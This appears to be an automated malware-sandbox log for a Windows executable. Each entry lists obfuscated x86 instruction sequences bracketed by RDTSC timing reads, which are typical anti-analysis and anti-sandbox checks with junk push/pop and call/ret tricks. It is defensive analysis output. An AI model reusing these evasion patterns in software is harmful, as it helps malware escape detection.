              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A0ACF second address: 3A0AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A37CA second address: 3A37CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A37CE second address: 3A37EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3B60BFE523h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A37EB second address: 3A37F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A4252 second address: 3A4258 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A4258 second address: 3A42BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B605222D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+12478F2Ah], eax 0x00000012 xor edi, dword ptr [ebp+12477CDBh] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F3B605222C8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D356Dh], eax 0x0000003a push 00000000h 0x0000003c mov esi, dword ptr [ebp+12458291h] 0x00000042 push eax 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 push ebx 0x00000047 pop ebx 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A5E01 second address: 3A5E07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A5E07 second address: 3A5E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A5E0B second address: 3A5E60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F3B60BFE518h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 sub dword ptr [ebp+122D1E75h], ebx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F3B60BFE518h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 00000015h 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 push 00000000h 0x00000047 movzx edi, ax 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push edx 0x0000004d push ebx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A5E60 second address: 3A5E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A5E65 second address: 3A5E6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A5E6A second address: 3A5E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B605222D0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A60B5 second address: 3A60B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A923E second address: 3A9248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A9248 second address: 3A92BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 and di, 5CBDh 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F3B60BFE518h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a push eax 0x0000002b mov di, C204h 0x0000002f pop ebx 0x00000030 jo 00007F3B60BFE51Ch 0x00000036 mov dword ptr [ebp+122D1AA6h], eax 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push edx 0x00000041 call 00007F3B60BFE518h 0x00000046 pop edx 0x00000047 mov dword ptr [esp+04h], edx 0x0000004b add dword ptr [esp+04h], 00000017h 0x00000053 inc edx 0x00000054 push edx 0x00000055 ret 0x00000056 pop edx 0x00000057 ret 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c jmp 00007F3B60BFE51Bh 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A92BA second address: 3A92BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AA424 second address: 3AA481 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3B60BFE516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F3B60BFE528h 0x00000010 nop 0x00000011 stc 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F3B60BFE518h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e add edi, dword ptr [ebp+122D3954h] 0x00000034 push 00000000h 0x00000036 mov edi, 42703AEEh 0x0000003b xchg eax, esi 0x0000003c push ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f jp 00007F3B60BFE516h 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AA481 second address: 3AA485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A94E7 second address: 3A94EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A94EC second address: 3A9508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B605222D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AB522 second address: 3AB526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD596 second address: 3AD59A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AA59B second address: 3AA5C4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3B60BFE516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F3B60BFE529h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AB687 second address: 3AB74D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B605222D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F3B605222C8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 jmp 00007F3B605222D7h 0x00000029 push dword ptr fs:[00000000h] 0x00000030 movsx edi, cx 0x00000033 jmp 00007F3B605222D8h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov dword ptr [ebp+122D566Bh], edx 0x00000045 mov eax, dword ptr [ebp+122D1309h] 0x0000004b add edi, 2FB7EB30h 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push ebp 0x00000056 call 00007F3B605222C8h 0x0000005b pop ebp 0x0000005c mov dword ptr [esp+04h], ebp 0x00000060 add dword ptr [esp+04h], 0000001Dh 0x00000068 inc ebp 0x00000069 push ebp 0x0000006a ret 0x0000006b pop ebp 0x0000006c ret 0x0000006d mov ebx, 2C4E8EA9h 0x00000072 mov dword ptr [ebp+122D353Ah], eax 0x00000078 push eax 0x00000079 push eax 0x0000007a push edx 0x0000007b push eax 0x0000007c push edx 0x0000007d pushad 0x0000007e popad 0x0000007f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD59A second address: 3AD5BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F3B60BFE518h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3B60BFE524h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AA5C4 second address: 3AA5C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AB74D second address: 3AB75D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE51Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AA5C9 second address: 3AA5CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3568D9 second address: 3568DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3568DD second address: 3568E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AA5CF second address: 3AA5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AEF2B second address: 3AEF31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AEF31 second address: 3AEF35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B0C44 second address: 3B0C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B0C4A second address: 3B0CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 js 00007F3B60BFE531h 0x0000000f call 00007F3B60BFE528h 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 push 00000000h 0x00000019 mov di, bx 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F3B60BFE518h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 00000019h 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 mov edi, ebx 0x0000003a sub ebx, dword ptr [ebp+122D2D32h] 0x00000040 xchg eax, esi 0x00000041 pushad 0x00000042 jmp 00007F3B60BFE51Eh 0x00000047 je 00007F3B60BFE51Ch 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B0CBC second address: 3B0CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F3B605222C6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B3B1B second address: 3B3B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B3B1F second address: 3B3B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B0DE9 second address: 3B0DF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B0DF0 second address: 3B0E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F3B605222CCh 0x00000010 jnc 00007F3B605222C6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B0E06 second address: 3B0E8E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3B60BFE51Ch 0x00000008 js 00007F3B60BFE516h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 jmp 00007F3B60BFE526h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007F3B60BFE518h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 00000019h 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 mov bx, D771h 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 adc ebx, 20A68616h 0x00000048 mov eax, dword ptr [ebp+122D1439h] 0x0000004e push FFFFFFFFh 0x00000050 mov dword ptr [ebp+122D566Bh], edx 0x00000056 nop 0x00000057 ja 00007F3B60BFE51Eh 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 js 00007F3B60BFE51Ch 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B0E8E second address: 3B0E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B1E7D second address: 3B1E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AFE9A second address: 3AFF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 nop 0x00000006 mov ebx, 06382300h 0x0000000b push dword ptr fs:[00000000h] 0x00000012 sbb bh, 00000015h 0x00000015 mov dword ptr fs:[00000000h], esp 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007F3B605222C8h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 00000015h 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 mov dword ptr [ebp+122D1E71h], ebx 0x0000003c mov eax, dword ptr [ebp+122D099Dh] 0x00000042 push 00000000h 0x00000044 push ebp 0x00000045 call 00007F3B605222C8h 0x0000004a pop ebp 0x0000004b mov dword ptr [esp+04h], ebp 0x0000004f add dword ptr [esp+04h], 00000016h 0x00000057 inc ebp 0x00000058 push ebp 0x00000059 ret 0x0000005a pop ebp 0x0000005b ret 0x0000005c xor edi, 463D3F57h 0x00000062 mov bl, 9Ch 0x00000064 push FFFFFFFFh 0x00000066 push edi 0x00000067 xor bh, 0000004Ch 0x0000006a pop ebx 0x0000006b call 00007F3B605222D3h 0x00000070 mov dword ptr [ebp+12457D4Ah], esi 0x00000076 pop ebx 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c push esi 0x0000007d pop esi 0x0000007e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AFF2D second address: 3AFF4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B533E second address: 3B5343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8003 second address: 3B8023 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3B60BFE51Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3B60BFE51Dh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8023 second address: 3B8039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B605222D2h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8039 second address: 3B8082 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3B60BFE516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov di, A8E0h 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+122D3308h], ebx 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007F3B60BFE518h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 stc 0x00000036 xchg eax, esi 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F3B60BFE51Ah 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8082 second address: 3B808F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3B605222C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B716A second address: 3B71E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 nop 0x00000007 xor dword ptr [ebp+122D1EF0h], esi 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F3B60BFE518h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e mov dword ptr fs:[00000000h], esp 0x00000035 mov bl, B0h 0x00000037 mov eax, dword ptr [ebp+122D1599h] 0x0000003d push 00000000h 0x0000003f push ebp 0x00000040 call 00007F3B60BFE518h 0x00000045 pop ebp 0x00000046 mov dword ptr [esp+04h], ebp 0x0000004a add dword ptr [esp+04h], 0000001Bh 0x00000052 inc ebp 0x00000053 push ebp 0x00000054 ret 0x00000055 pop ebp 0x00000056 ret 0x00000057 push FFFFFFFFh 0x00000059 mov ebx, dword ptr [ebp+122D3838h] 0x0000005f mov edi, dword ptr [ebp+12450529h] 0x00000065 nop 0x00000066 pushad 0x00000067 push ecx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B9FDD second address: 3B9FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 365AC5 second address: 365ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jnc 00007F3B60BFE51Eh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B82EF second address: 3B8303 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B605222D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8303 second address: 3B8309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BCE7F second address: 3BCE8C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3B605222C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BFA08 second address: 3BFA0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C26D7 second address: 3C26E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F3B605222C6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C26E4 second address: 3C26EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C29DA second address: 3C29E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C29E0 second address: 3C29FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3B60BFE51Fh 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C7E7A second address: 3C7E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C7E7E second address: 3C7E82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C7E82 second address: 3C7E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C8021 second address: 3C8026 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C8026 second address: 3C8033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C8033 second address: 3C806F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F3B60BFE51Ch 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 js 00007F3B60BFE52Eh 0x00000017 jmp 00007F3B60BFE528h 0x0000001c mov eax, dword ptr [eax] 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C806F second address: 3C8073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C819F second address: 3C81DD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3B60BFE526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F3B60BFE526h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jl 00007F3B60BFE51Eh 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C81DD second address: 3C81EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F3B605222C8h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C81EE second address: 3C8215 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE525h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 jnc 00007F3B60BFE516h 0x00000016 pop ebx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CCDEA second address: 3CCDEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CCDEE second address: 3CCDF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
